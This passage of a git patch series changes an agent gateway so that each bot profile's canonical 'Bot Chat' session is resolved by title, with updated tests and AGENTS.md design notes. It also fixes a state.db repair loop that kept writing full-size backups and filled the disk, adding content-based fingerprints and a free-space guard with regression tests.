skips resolution entirely. +- Resolution reads each profile's OWN state.db (strict per-profile scoping). +""" + +from __future__ import annotations + +import pytest + +import tui_gateway.server as srv + + +@pytest.fixture +def home(tmp_path, monkeypatch): + """Temp HERMES_HOME with the default profile plus one named profile.""" + h = tmp_path / ".hermes" + (h / "profiles" / "ops").mkdir(parents=True) + monkeypatch.setenv("HERMES_HOME", str(h)) + return h + + +def _db(profile_dir): + from hermes_state import SessionDB + + return SessionDB(db_path=profile_dir / "state.db") + + +def _add_session(db, sid, *, source="cli", title="", ts, text, hidden=False, + parent=None, end_reason=None): + """Create one session with a single user message at an exact timestamp.""" + db.create_session(sid, source, parent_session_id=parent) + db.append_message(sid, "user", text, timestamp=ts) + with db._lock: + db._conn.execute("UPDATE sessions SET title = ? WHERE id = ?", (title, sid)) + if end_reason: + # Mark ended AFTER appending: the DB (correctly) refuses writes + # to a compression-closed session. + db._conn.execute( + "UPDATE sessions SET ended_at = ?, end_reason = ? WHERE id = ?", + (ts + 1, end_reason, sid), + ) + if hidden: + db.set_session_hidden(sid, True) + + +def _profiles(params): + envelope = srv._methods["profiles.list"](1, params) + return envelope["result"]["profiles"] + + +def _row(profiles, name): + return next(p for p in profiles if p["name"] == name) + + +# --------------------------------------------------------------------------- +# canonical_session resolution +# --------------------------------------------------------------------------- + + +def test_canonical_session_is_the_bot_chat_row_not_latest(home): + db = _db(home) + _add_session(db, "forever1", title="Bot Chat", ts=1000, text="forever chat content") + _add_session(db, "other1", title="Scratch", ts=2000, text="scratch pad content") + db.close() + + row = _row(_profiles({}), "default") + + canonical = row["canonical_session"] + assert canonical["id"] == "forever1" + assert canonical["resolved_id"] == "forever1" + assert canonical["root_title"] == "Bot Chat" + assert canonical["title"] == "Bot Chat" + assert "forever chat content" in canonical["preview"] + # last_session keeps its own contract: the most recently active session. + assert row["last_session"]["id"] == "other1" + + +def test_canonical_session_resolves_hidden_row(home): + db = _db(home) + _add_session(db, "hiddenchat", title="Bot Chat", ts=1000, + text="hidden bot chat content", hidden=True) + _add_session(db, "visible1", title="Visible", ts=2000, text="visible content") + db.close() + + row = _row(_profiles({}), "default") + + # Canonical chats are always hidden — the registry lookup must see them. + assert row["canonical_session"] is not None + assert row["canonical_session"]["id"] == "hiddenchat" + assert "hidden bot chat content" in row["canonical_session"]["preview"] + # …while the generic latest-session listing still excludes hidden rows. + assert row["last_session"]["id"] == "visible1" + + +def test_canonical_session_none_when_no_bot_chat_row(home): + db = _db(home) + _add_session(db, "real1", title="Real", ts=1000, text="real content") + db.close() + + row = _row(_profiles({}), "default") + + assert row["canonical_session"] is None + assert row["last_session"]["id"] == "real1" + + +def test_canonical_session_denied_internal_source_returns_none(home): + db = _db(home) + _add_session(db, "toolrun", source="tool", title="Bot Chat", ts=1000, text="tool output") + _add_session(db, "human1", title="Human", ts=2000, text="human content") + db.close() + + row = _row(_profiles({}), "default") + + # Internal sources (tool sub-agent runs, kanban workers) are not + # conversations — a registry row minted by one resolves as absent. + assert row["canonical_session"] is None + + +def test_canonical_session_resolves_compression_tip(home): + db = _db(home) + _add_session(db, "root1", title="Bot Chat", ts=1000, + text="pre-compression content", end_reason="compression") + _add_session(db, "tip1", title="Bot Chat (continued)", ts=3000, + text="post-compression content", parent="root1") + _add_session(db, "other1", title="Other", ts=4000, text="other content") + db.close() + + row = _row(_profiles({}), "default") + + canonical = row["canonical_session"] + # The registry row keeps its durable identity; the summary comes from the + # live tip. + assert canonical["id"] == "root1" + assert canonical["resolved_id"] == "tip1" + assert canonical["root_title"] == "Bot Chat" + assert canonical["title"] == "Bot Chat (continued)" + assert "post-compression content" in canonical["preview"] + + +# --------------------------------------------------------------------------- +# Contract guards +# --------------------------------------------------------------------------- + + +def test_include_sessions_false_skips_canonical(home): + db = _db(home) + _add_session(db, "s1", title="Bot Chat", ts=1000, text="content") + db.close() + + row = _row(_profiles({"include_sessions": False}), "default") + assert "last_session" not in row + assert "canonical_session" not in row + + +def test_canonical_session_scoped_per_profile_db(home): + # A "Bot Chat" row in BOTH profiles' state.db files, different content — + # each roster row must summarize its own profile's database. + default_db = _db(home) + _add_session(default_db, "chat-default", title="Bot Chat", ts=1000, + text="default profile content") + default_db.close() + + ops_db = _db(home / "profiles" / "ops") + _add_session(ops_db, "chat-ops", title="Bot Chat", ts=1000, + text="ops profile content") + ops_db.close() + + rows = _profiles({}) + assert "default profile content" in _row(rows, "default")["canonical_session"]["preview"] + assert "ops profile content" in _row(rows, "ops")["canonical_session"]["preview"] diff --git a/tests/tui_gateway/test_profiles_list_preferred_session.py b/tests/tui_gateway/test_profiles_list_preferred_session.py deleted file mode 100644 index 9c130f15b5..0000000000 --- a/tests/tui_gateway/test_profiles_list_preferred_session.py +++ /dev/null @@ -1,211 +0,0 @@ -"""Tests: profiles.list ``preferred_session_ids`` precise session summaries. - -Why: the desktop BOTS roster previews ``last_session`` (the profile's most -recently active session) but clicking a bot row opens the PINNED canonical -chat — two different session identities, so the preview shows one -conversation and the click lands in another (NousResearch/hermes-agent#88200). -The generic fix at the RPC layer: callers that know which session they care -about pass ``preferred_session_ids={profile: session_id}`` and receive a -precise ``preferred_session`` summary per profile — hidden sessions included, -compression lineages resolved to the live tip, no pagination window — while -``last_session`` keeps its existing "most recent" contract. - -Contract under test: -- A profile named in the map gets ``preferred_session``: a summary dict when - the id resolves, ``None`` when it definitively does not (missing row, - denied internal source). -- Summary keys: ``id`` (the requested pin, durable identity), ``resolved_id`` - (live compression tip; equal to ``id`` when uncompressed), ``title``, - ``preview`` (newest user/assistant text at the tip), ``started_at``, - ``last_active``, ``message_count``. -- Profiles not named in the map carry no ``preferred_session`` key at all. -- ``last_session`` behaviour is unchanged in every case. -- ``include_sessions: false`` skips preferred resolution entirely. -- Resolution reads each profile's OWN state.db (strict per-profile scoping). -""" - -from __future__ import annotations - -import pytest - -import tui_gateway.server as srv - - -@pytest.fixture -def home(tmp_path, monkeypatch): - """Temp HERMES_HOME with the default profile plus one named profile.""" - h = tmp_path / ".hermes" - (h / "profiles" / "ops").mkdir(parents=True) - monkeypatch.setenv("HERMES_HOME", str(h)) - return h - - -def _db(profile_dir): - from hermes_state import SessionDB - - return SessionDB(db_path=profile_dir / "state.db") - - -def _add_session(db, sid, *, source="cli", title="", ts, text, hidden=False, - parent=None, end_reason=None): - """Create one session with a single user message at an exact timestamp.""" - db.create_session(sid, source, parent_session_id=parent) - db.append_message(sid, "user", text, timestamp=ts) - with db._lock: - db._conn.execute("UPDATE sessions SET title = ? WHERE id = ?", (title, sid)) - if end_reason: - # Mark ended AFTER appending: the DB (correctly) refuses writes - # to a compression-closed session. - db._conn.execute( - "UPDATE sessions SET ended_at = ?, end_reason = ? WHERE id = ?", - (ts + 1, end_reason, sid), - ) - if hidden: - db.set_session_hidden(sid, True) - - -def _profiles(params): - envelope = srv._methods["profiles.list"](1, params) - return envelope["result"]["profiles"] - - -def _row(profiles, name): - return next(p for p in profiles if p["name"] == name) - - -# --------------------------------------------------------------------------- -# preferred_session resolution -# --------------------------------------------------------------------------- - - -def test_preferred_session_summarizes_pin_not_latest(home): - db = _db(home) - _add_session(db, "pinned1", title="Bot Chat", ts=1000, text="pinned chat content") - _add_session(db, "other1", title="Scratch", ts=2000, text="scratch pad content") - db.close() - - rows = _profiles({"preferred_session_ids": {"default": "pinned1"}}) - row = _row(rows, "default") - - pref = row["preferred_session"] - assert pref["id"] == "pinned1" - assert pref["resolved_id"] == "pinned1" - assert pref["root_title"] == "Bot Chat" - assert pref["title"] == "Bot Chat" - assert "pinned chat content" in pref["preview"] - # last_session keeps its own contract: the most recently active session. - assert row["last_session"]["id"] == "other1" - - -def test_preferred_session_resolves_hidden_pin(home): - db = _db(home) - _add_session(db, "hiddenpin", title="Bot Chat", ts=1000, - text="hidden bot chat content", hidden=True) - _add_session(db, "visible1", title="Visible", ts=2000, text="visible content") - db.close() - - rows = _profiles({"preferred_session_ids": {"default": "hiddenpin"}}) - row = _row(rows, "default") - - # The pin is precise: hidden from listings must not mean "does not exist". - assert row["preferred_session"] is not None - assert row["preferred_session"]["id"] == "hiddenpin" - assert "hidden bot chat content" in row["preferred_session"]["preview"] - # …while the generic latest-session listing still excludes hidden rows. - assert row["last_session"]["id"] == "visible1" - - -def test_preferred_session_missing_returns_none_and_keeps_last_session(home): - db = _db(home) - _add_session(db, "real1", title="Real", ts=1000, text="real content") - db.close() - - rows = _profiles({"preferred_session_ids": {"default": "does-not-exist"}}) - row = _row(rows, "default") - - assert row["preferred_session"] is None - assert row["last_session"]["id"] == "real1" - - -def test_preferred_session_denied_internal_source_returns_none(home): - db = _db(home) - _add_session(db, "toolrun", source="tool", title="", ts=1000, text="tool output") - _add_session(db, "human1", title="Human", ts=2000, text="human content") - db.close() - - rows = _profiles({"preferred_session_ids": {"default": "toolrun"}}) - row = _row(rows, "default") - - # Internal sources (tool sub-agent runs, kanban workers) are not - # conversations — a pin pointing at one resolves as absent. - assert row["preferred_session"] is None - - -def test_preferred_session_resolves_compression_tip(home): - db = _db(home) - _add_session(db, "root1", title="Bot Chat", ts=1000, - text="pre-compression content", end_reason="compression") - _add_session(db, "tip1", title="Bot Chat (continued)", ts=3000, - text="post-compression content", parent="root1") - _add_session(db, "other1", title="Other", ts=4000, text="other content") - db.close() - - rows = _profiles({"preferred_session_ids": {"default": "root1"}}) - row = _row(rows, "default") - - pref = row["preferred_session"] - # The pin keeps its durable identity; the summary comes from the live tip. - assert pref["id"] == "root1" - assert pref["resolved_id"] == "tip1" - assert pref["root_title"] == "Bot Chat" - assert pref["title"] == "Bot Chat (continued)" - assert "post-compression content" in pref["preview"] - - -# --------------------------------------------------------------------------- -# Contract guards -# --------------------------------------------------------------------------- - - -def test_no_param_omits_preferred_key(home): - db = _db(home) - _add_session(db, "s1", title="S", ts=1000, text="content") - db.close() - - row = _row(_profiles({}), "default") - assert "preferred_session" not in row - assert row["last_session"]["id"] == "s1" - - -def test_include_sessions_false_skips_preferred(home): - db = _db(home) - _add_session(db, "s1", title="S", ts=1000, text="content") - db.close() - - row = _row( - _profiles({"include_sessions": False, - "preferred_session_ids": {"default": "s1"}}), - "default", - ) - assert "last_session" not in row - assert "preferred_session" not in row - - -def test_preferred_ids_scoped_per_profile_db(home): - # Same session id in BOTH profiles' state.db files, different content — - # each row must summarize its own profile's database. - default_db = _db(home) - _add_session(default_db, "shared1", title="Default Bot", ts=1000, - text="default profile content") - default_db.close() - - ops_db = _db(home / "profiles" / "ops") - _add_session(ops_db, "shared1", title="Ops Bot", ts=1000, - text="ops profile content") - ops_db.close() - - rows = _profiles( - {"preferred_session_ids": {"default": "shared1", "ops": "shared1"}} - ) - assert "default profile content" in _row(rows, "default")["preferred_session"]["preview"] - assert "ops profile content" in _row(rows, "ops")["preferred_session"]["preview"] diff --git a/tui_gateway/methods_profiles.py b/tui_gateway/methods_profiles.py index a7bd780c3c..986155be64 100644 --- a/tui_gateway/methods_profiles.py +++ b/tui_gateway/methods_profiles.py @@ -60,21 +60,22 @@ def _(rid, params: dict) -> dict: return text[:80] + "..." return text - def _preferred_session_row(profile_path, session_id): - """Precise summary for ONE caller-pinned session id, or None. + def _canonical_session_row(profile_path): + """Summary of the profile's canonical "Bot Chat" registry row, or None. - Complements ``last_session``: that field answers "what is the newest - conversation", this answers "what about THIS conversation". Callers - that open a specific session on click (e.g. a roster whose rows open - a pinned chat) pass their pins via ``preferred_session_ids`` so the - preview and the click target describe the same session - (hermes-agent#88200). + The canonical chat's identity is the NAME: the session titled exactly + "Bot Chat" on this profile (core UNIQUE(title) makes it a registry of + at most one row). Complements ``last_session``: that field answers + "what is the newest conversation", this answers "where is the + forever-chat" — so a roster row's preview and its click target + describe the same session (hermes-agent#88200) with no client-side + pointer involved. Exact-lookup semantics, deliberately different from the listing: - hidden rows still resolve (a hidden-from-sidebar session EXISTS), + hidden rows still resolve (canonical chats are always hidden), compression lineages resolve to the live tip with the same resolver ``session.resume`` uses, and denied internal sources (tool/kanban) - count as absent. The reported ``id`` stays the caller's durable pin + count as absent. The reported ``id`` stays the durable registry row while ``resolved_id`` names the live tip. Best-effort: any failure degrades to None rather than failing the whole profiles.list call. """ @@ -89,9 +90,12 @@ def _(rid, params: dict) -> dict: deny = frozenset({"kanban", "tool"}) db = SessionDB(db_path=db_path) try: - row = db.get_session(session_id) + row = db.get_session_by_title("Bot Chat") if not row: return None + session_id = str(row.get("id") or "").strip() + if not session_id: + return None if (row.get("source") or "").strip().lower() in deny: return None if row.get("archived"): @@ -205,13 +209,6 @@ def _(rid, params: dict) -> dict: from hermes_cli.profiles import list_profiles include_sessions = is_truthy_value(params.get("include_sessions", True)) - # Optional precise lookups: {profile_name: session_id} from callers - # that open a specific session per row (pinned-chat rosters). Only - # resolved when include_sessions is on; each named profile row gains - # a ``preferred_session`` summary (None when the id is gone). - preferred_ids = params.get("preferred_session_ids") - if not isinstance(preferred_ids, dict): - preferred_ids = {} out = [] for p in list_profiles(): row = { @@ -231,9 +228,10 @@ def _(rid, params: dict) -> dict: # a profile as active while its worker runs (#90268). Older # clients ignore the extra field. row["worker_session"] = worker_row - pin = preferred_ids.get(p.name) - if isinstance(pin, str) and pin.strip(): - row["preferred_session"] = _preferred_session_row(p.path, pin.strip()) + # The profile's canonical "Bot Chat" registry row (or None) — + # identity is the NAME, resolved server-side on every listing + # so no client ever needs to carry a session pointer. + row["canonical_session"] = _canonical_session_row(p.path) # Client-agnostic UI metadata (avatars, accent colors, pinned # order, …) — stored server-side in profile.yaml so every diff --git a/tui_gateway/methods_session.py b/tui_gateway/methods_session.py index 564271ea13..91f6abb468 100644 --- a/tui_gateway/methods_session.py +++ b/tui_gateway/methods_session.py @@ -186,7 +186,7 @@ def _(rid, params: dict) -> dict: # resolve (canonical chats are born hidden); archived rows and # deny-listed sources do not; compression lineages resolve to the # live tip (``resolved_id``), mirroring profiles.list's - # preferred_session resolver. Older clients never send this param; + # canonical_session resolver. Older clients never send this param; # newer clients falling back to older gateways just get the normal # windowed listing back (the param is ignored) and scan it. title_lookup = str(params.get("title") or "").strip() From f70e6146dd49c4cd46f42c2b28baa100aae6cd5c Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Sat, 22 Aug 2026 00:31:01 -0700 Subject: [PATCH 123/161] docs: record the Bot Mode canonical-chat invariant in AGENTS.md --- AGENTS.md | 52 ++++++++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 52 insertions(+) diff --git a/AGENTS.md b/AGENTS.md index b951e238fa..b949daf93e 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -920,6 +920,58 @@ plug into `agent/context_engine.py`; image-gen providers into [`hermes-example-plugins`](https://github.com/NousResearch/hermes-example-plugins) companion repo, not in this tree. +### Bot Mode (`apps/desktop/src/plugins/hermes-bots/`) + +The desktop "Bots" experience ships bundled in-tree. Each bot is a Hermes +agent **profile** with a persistent identity. Its design rests on one settled +invariant that has been regressed twice, cost users real conversation +history both times, and is not open for re-litigation in a routine PR: + +**One bot = ONE canonical forever-chat ("Bot Chat"), ever.** The full +lifecycle when a bot row is clicked: + +1. **A live pin ALWAYS and ONLY wins.** If the bot's pinned session resolves + (verified through the backend's `preferred_session` resolver), open it. + Nothing overrides it — not recency, not a newer visible session, not a + title mismatch on a pin that carries real history (grandfathered chats + stay adopted). +2. **No/dead pin → adopt before mint.** Look up the profile's existing + `Bot Chat` session by title via `session.list include_hidden:true` (the + state DB's unique-title index makes this an exact registry lookup) and + re-pin it. Only if none exists, create one. +3. **Create-time title conflict → adopt.** A failed/conflicting create means + the canonical session already exists — register that session as the pin. + Never mint a differently-titled replacement. (`set_session_title` + silently drops conflicting titles — returns 0 rows — which is how the + 2026-08 infinite fork loop started.) + +Why recency must never win (the #91791 → #92042 lesson): canonical Bot +Chats are **unconditionally hidden** from the Sessions sidebar, so the bot +row is the ONLY door to the forever-chat. A "newest visible session wins" +preference doesn't re-order two equivalent entry points — it walls the +entire relationship off behind a row that previews one session and opens +another, and any stray draft that catches a prompt captures the row. +Side-chats started via "New chat with this agent" are not plumbing-titled, +stay visible in the Sessions sidebar, and are reachable there; they are +never the bot row's target. + +Corollaries for reviewers: + +- There is no per-bot session browser, by explicit design (removed in + #90732). Do not add one back. +- A pinned session with real messages is the user's conversation whatever + its title says; only a pin resolving to an *empty* stray draft counts as + corrupted metadata. +- Reject any PR that consults recency, visibility, or "where the user left + off" while the pin is alive — reports that motivate such a change are + almost always about side-chats, and the fix belongs in the Sessions + sidebar (hide-sweep false positives), not in the bot row's target. + +Regression tests encoding this contract: +`tests/bot-row-opens-canonical-chat.test.mjs`, +`tests/canonical-chat-adopt-before-mint.test.mjs`, +`tests/canonical-chat-pin.test.mjs`, `tests/hide-bot-chats.test.mjs`. + --- ## Skills From 14c59f0b505ea34fb46991784e0a996ceab70dcc Mon Sep 17 00:00:00 2001 From: Teknium <127238744+teknium1@users.noreply.github.com> Date: Sat, 22 Aug 2026 01:09:39 -0700 Subject: [PATCH 124/161] =?UTF-8?q?docs(agents-md):=20Bot=20Mode=20canonic?= =?UTF-8?q?al-chat=20invariant=20is=20name-identity=20=E2=80=94=20correcti?= =?UTF-8?q?ons=20folded=20in?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit The cherry-picked #92121 text documented the pin-first contract (#92042 era). Corrected to the registry contract this branch ships: identity is (profile, 'Bot Chat') via exact-title lookup; there is no session-id pin at any tier; reviewer corollaries and regression-test references updated to the surviving suites. --- AGENTS.md | 64 +++++++++++++++++++++++++++++++++---------------------- 1 file changed, 39 insertions(+), 25 deletions(-) diff --git a/AGENTS.md b/AGENTS.md index b949daf93e..e140522e96 100644 --- a/AGENTS.md +++ b/AGENTS.md @@ -924,26 +924,34 @@ companion repo, not in this tree. The desktop "Bots" experience ships bundled in-tree. Each bot is a Hermes agent **profile** with a persistent identity. Its design rests on one settled -invariant that has been regressed twice, cost users real conversation -history both times, and is not open for re-litigation in a routine PR: +invariant that has been regressed repeatedly, cost users real conversation +history each time, and is not open for re-litigation in a routine PR: -**One bot = ONE canonical forever-chat ("Bot Chat"), ever.** The full -lifecycle when a bot row is clicked: +**One bot = ONE canonical forever-chat, identified by NAME.** The chat's one +and only identity is **(profile, session titled exactly "Bot Chat")** — the +state DB's UNIQUE(title) index makes that pair an exact registry of at most +one row. The full lifecycle when a bot row is clicked: -1. **A live pin ALWAYS and ONLY wins.** If the bot's pinned session resolves - (verified through the backend's `preferred_session` resolver), open it. - Nothing overrides it — not recency, not a newer visible session, not a - title mismatch on a pin that carries real history (grandfathered chats - stay adopted). -2. **No/dead pin → adopt before mint.** Look up the profile's existing - `Bot Chat` session by title via `session.list include_hidden:true` (the - state DB's unique-title index makes this an exact registry lookup) and - re-pin it. Only if none exists, create one. -3. **Create-time title conflict → adopt.** A failed/conflicting create means - the canonical session already exists — register that session as the pin. - Never mint a differently-titled replacement. (`set_session_title` - silently drops conflicting titles — returns 0 rows — which is how the - 2026-08 infinite fork loop started.) +1. **Resolve the registry, every time.** Look up the profile's `Bot Chat` + session by exact title via `session.list {title, include_hidden: true}` + (indexed, window-free; hidden rows resolve because canonical chats are + always hidden; compression lineages resolve to the live tip). Row exists → + open it. That is the entire happy path. +2. **No row → create it,** titled `Bot Chat`, born hidden, kicked off with + the bot's intro. Creation adopts-before-minting: it re-runs the registry + lookup first, so a concurrent or pre-existing row is opened, never forked. + (`set_session_title` silently drops conflicting titles — returns 0 rows — + which is how the 2026-08 infinite fork loop started; adopt-before-mint is + what kills it.) + +**There is NO session-id pin.** The previous design stored a pointer in +`ui_meta['hermes-bots'].chat` and verified it per click; five hardening +waves (#88690, #90732, #90751, the #91791 revert, #92042) each guarded a new +way that pointer dangled or got stolen — rows[0] steals, `last_session` +adoptions, transient clears, drifted-title welds (a pin re-anchored onto a +cron session passed every guard). Name-as-identity removes the failure class: +a name cannot dangle, and a corrupted historical pointer simply never gets +read. Legacy `chat` keys in ui_meta are ignored and dropped from merges. Why recency must never win (the #91791 → #92042 lesson): canonical Bot Chats are **unconditionally hidden** from the Sessions sidebar, so the bot @@ -959,18 +967,24 @@ Corollaries for reviewers: - There is no per-bot session browser, by explicit design (removed in #90732). Do not add one back. -- A pinned session with real messages is the user's conversation whatever - its title says; only a pin resolving to an *empty* stray draft counts as - corrupted metadata. +- Reject any PR that reintroduces a stored session-id pointer as canonical + identity — including "as a fallback tier" or "for verification". The + registry lookup is the whole contract; pointers are how every prior + incident started. - Reject any PR that consults recency, visibility, or "where the user left - off" while the pin is alive — reports that motivate such a change are + off" for the bot row's target — reports that motivate such a change are almost always about side-chats, and the fix belongs in the Sessions sidebar (hide-sweep false positives), not in the bot row's target. +- The gateway reports the registry row per profile as `canonical_session` + on `profiles.list` (resolved server-side by title); roster preview, + activity signals, and the `/new`→`/compact` guard all read it, so preview + identity and click identity are the same row by construction. Regression tests encoding this contract: -`tests/bot-row-opens-canonical-chat.test.mjs`, -`tests/canonical-chat-adopt-before-mint.test.mjs`, -`tests/canonical-chat-pin.test.mjs`, `tests/hide-bot-chats.test.mjs`. +`tests/canonical-chat-registry.test.mjs` (includes a tripwire asserting the +open path never reads or writes a stored pointer), +`tests/canonical-chat-creation.test.mjs`, `tests/hide-bot-chats.test.mjs`, +and `tests/tui_gateway/test_profiles_list_canonical_session.py`. --- From 27d661e171932c9f292b26c531cda250a27ac8c9 Mon Sep 17 00:00:00 2001 From: jirathip-k <115384744+jirathip-k@users.noreply.github.com> Date: Mon, 17 Aug 2026 14:03:21 +0700 Subject: [PATCH 125/161] fix(state): stop unbounded state.db repair loop from filling the disk A malformed-schema state.db sent Hermes into a repair loop that wrote a fresh full-size forensic backup every ~10s: 31 copies / 2.3GB in 20 minutes, free space heading to zero on a host running an agent fleet. The #86747 guards for exactly this were already present and did not hold. Both keyed on `size:mtime_ns`: * `_db_fingerprint` -> the ledger's attempt counter reset to 1 on every pass, so `_MAX_PERSISTENT_REPAIR_ATTEMPTS` was never reached and the loop never terminated; * `_backup_db_file`'s dedupe compared mtime, so it never matched and each pass wrote another full-size copy. The assumption behind that key -- "nothing can successfully write to a damaged file" -- holds for the b-tree damage of #86747 but not for the malformed-SCHEMA class: the DB still opens and accepts writes (only sqlite_master is unreadable), so live writers, WAL checkpoints and the in-place repair strategies themselves all move mtime between passes. Fixes: * fingerprint on size + a bounded head/tail content sample instead of mtime. Stable across passes that merely touch the file, still changes on genuine repair/truncation/restore (so recovery resets the budget), and stays O(1) on a multi-GB DB. * dedupe the forensic backup on that same fingerprint. * add the missing free-space guard: refuse the pre-repair copy when it would leave under 2GiB free, with an actionable error. The backup is a full raw copy of the damaged DB, so a repair loop is a disk amplifier that can take down every process on the host -- and the refusal path already hard-stops the repair (#69603) rather than mutating the only remaining copy. Tests fail on the unfixed tree and pass here; the pre-existing failures in test_state_db_malformed_repair.py and TestFTS5Search are unrelated and reproduce on the base commit. --- hermes_state.py | 82 +++++++++-- tests/test_state_db_repair_loop_mtime.py | 168 +++++++++++++++++++++++ 2 files changed, 237 insertions(+), 13 deletions(-) create mode 100644 tests/test_state_db_repair_loop_mtime.py diff --git a/hermes_state.py b/hermes_state.py index 60e63ba8ee..ca78943f9e 100644 --- a/hermes_state.py +++ b/hermes_state.py @@ -1854,22 +1854,55 @@ def _bump_schema_cookie(conn: sqlite3.Connection) -> None: _MAX_PERSISTENT_REPAIR_ATTEMPTS = 3 _MAX_MALFORMED_BACKUPS = 3 +# Head/tail bytes sampled by ``_db_fingerprint``. Enough to change whenever +# the DB is genuinely repaired, truncated or restored (SQLite rewrites the +# header on any real recovery), while staying O(1) on a multi-GB file. +_FINGERPRINT_SAMPLE_BYTES = 65536 + +# Free-space floor for the pre-repair forensic backup. The backup is a full +# raw copy of the damaged DB, so a repair loop on a large state.db is a disk +# amplifier: the reported incident wrote 98MB every ~10s until the volume was +# nearly full, which would have taken down every agent on the host. Refuse +# the copy unless the volume would still hold this much afterwards. +_REPAIR_BACKUP_MIN_FREE_BYTES = 2 * 1024 * 1024 * 1024 # 2 GiB + def _repair_ledger_path(db_path: Path) -> Path: return db_path.with_name(db_path.name + ".repair-attempts.json") def _db_fingerprint(db_path: Path) -> "Optional[str]": - """Cheap identity for a damaged DB file: size + mtime_ns. + """Cheap identity for a damaged DB file: size + a bounded content sample. - Hashing a multi-GB corrupt file on every open is exactly the kind of - repeated cost this ledger exists to avoid; size+mtime is stable for a - file nothing can successfully write to, and any successful repair, - truncation or manual restore changes it (resetting the attempt count). + Deliberately EXCLUDES mtime. The original ledger keyed on + ``size:mtime_ns`` on the assumption that "nothing can successfully write + to a damaged file", but that does not hold for the malformed-schema + class: the DB still opens and accepts writes (only ``sqlite_master`` is + unreadable), so live writers, WAL checkpoints and the in-place repair + strategies themselves all move mtime between passes. Every pass then + looked like a NEW file — the attempt counter reset to 1 forever, never + reaching ``_MAX_PERSISTENT_REPAIR_ATTEMPTS``, and the ``_backup_db_file`` + dedupe (which compares mtime too) never matched, so each pass wrote + another full-size forensic copy. Observed: a repair every ~10s, a fresh + 98MB copy each time, 2.3GB in 20 minutes, disk heading to zero. + + Hashing a multi-GB corrupt file on every open is the repeated cost this + ledger exists to avoid, so sample instead of digesting the whole file: + size plus the head/tail slices that any real repair, truncation or + restore necessarily changes. Stable across passes that merely touch + mtime; still resets the attempt count after genuine recovery. """ try: st = db_path.stat() - return f"{st.st_size}:{st.st_mtime_ns}" + with open(db_path, "rb") as fh: + head = fh.read(_FINGERPRINT_SAMPLE_BYTES) + if st.st_size > _FINGERPRINT_SAMPLE_BYTES: + fh.seek(max(0, st.st_size - _FINGERPRINT_SAMPLE_BYTES)) + tail = fh.read(_FINGERPRINT_SAMPLE_BYTES) + else: + tail = b"" + digest = hashlib.sha256(head + tail).hexdigest()[:32] + return f"{st.st_size}:{digest}" except OSError: return None @@ -2018,15 +2051,18 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": # Dedupe (#86747): a repair loop used to copy the SAME damaged bytes # on every restart — ~900MB a pass, 89GB over 11 days in the # reporting install. If the newest existing backup already matches - # this file (size + mtime preserved by copy2), reuse it. + # this file, reuse it. + # + # Matching on mtime made this dedupe miss exactly when it mattered + # most: the malformed-SCHEMA class still accepts writes, so live + # writers and the in-place repair strategies move mtime between + # passes and every pass wrote another full-size copy (2.3GB in 20 + # minutes). Compare the content fingerprint instead, which is stable + # while the damaged bytes are. try: - src_stat = db_path.stat() + src_fp = _db_fingerprint(db_path) for existing in _existing_malformed_backups(db_path)[:1]: - est = existing.stat() - if ( - est.st_size == src_stat.st_size - and est.st_mtime_ns == src_stat.st_mtime_ns - ): + if src_fp is not None and _db_fingerprint(existing) == src_fp: logger.info( "Reusing existing forensic backup %s (identical to the " "damaged DB).", existing, @@ -2034,6 +2070,26 @@ def _backup_db_file(db_path: Path) -> "Tuple[Optional[Path], Optional[str]]": return existing, None except OSError: pass + # Disk guard: this is a full raw copy of a possibly multi-GB DB. On a + # host whose volume is already nearly full — which a preceding repair + # loop may itself have caused — taking it can finish off the disk and + # take down every process on the machine. Refuse while there is still + # room to refuse in. + try: + src_size = db_path.stat().st_size + free = shutil.disk_usage(db_path.parent).free + if free - src_size < _REPAIR_BACKUP_MIN_FREE_BYTES: + reason = ( + f"only {free / 1e9:.1f}GB free on {db_path.parent}; copying " + f"the {src_size / 1e9:.1f}GB damaged DB would leave less than " + f"{_REPAIR_BACKUP_MIN_FREE_BYTES / 1e9:.1f}GB. Free disk space, " + "then retry (or recover manually with `sqlite3 " + f"{db_path} \".recover\"`)." + ) + logger.error("Refusing forensic backup of %s: %s", db_path, reason) + return None, reason + except OSError: + pass shutil.copy2(db_path, backup_path) for suffix in ("-wal", "-shm"): sidecar = db_path.with_name(db_path.name + suffix) diff --git a/tests/test_state_db_repair_loop_mtime.py b/tests/test_state_db_repair_loop_mtime.py new file mode 100644 index 0000000000..7a625d31f4 --- /dev/null +++ b/tests/test_state_db_repair_loop_mtime.py @@ -0,0 +1,168 @@ +"""Regression: the state.db repair-loop guards must survive an mtime change. + +Incident (2026-08-17): a malformed-SCHEMA state.db sent Hermes into an +unbounded repair loop that wrote a fresh 98MB forensic copy every ~10s — +2.3GB in 20 minutes, disk heading to zero, whole agent fleet at risk. + +The #86747 guards were already present and did NOT hold, because both keyed +on ``size:mtime_ns``: + +* ``_db_fingerprint`` -> the ledger's attempt counter reset to 1 on every + pass, so ``_MAX_PERSISTENT_REPAIR_ATTEMPTS`` was never reached; +* ``_backup_db_file``'s dedupe compared mtime, so it never matched and each + pass wrote another full-size copy. + +Unlike the b-tree damage of #86747, the malformed-SCHEMA class still opens +and accepts writes (only ``sqlite_master`` is unreadable), so live writers, +WAL checkpoints and the in-place repair strategies all move mtime between +passes. These tests pin the guards to content, not mtime, and add the +missing free-space refusal. +""" + +from __future__ import annotations + +import os +import time +from pathlib import Path +from unittest.mock import patch + +import hermes_state +from hermes_state import ( + _MAX_MALFORMED_BACKUPS, + _MAX_PERSISTENT_REPAIR_ATTEMPTS, + _REPAIR_BACKUP_MIN_FREE_BYTES, + _backup_db_file, + _db_fingerprint, + _existing_malformed_backups, + _persistent_repair_attempts_exhausted, + _record_repair_outcome, +) + + +def _damaged_db(tmp_path: Path, size: int = 200_000) -> Path: + db = tmp_path / "state.db" + db.write_bytes(b"SQLite format 3\x00" + os.urandom(size)) + return db + + +# --------------------------------------------------------------------------- +# Fingerprint stability +# --------------------------------------------------------------------------- + + +def test_fingerprint_survives_mtime_change(tmp_path): + """A touched-but-unchanged file keeps its identity (the incident's core).""" + db = _damaged_db(tmp_path) + before = _db_fingerprint(db) + time.sleep(0.01) + os.utime(db, None) # live writer / WAL checkpoint / in-place repair pass + assert 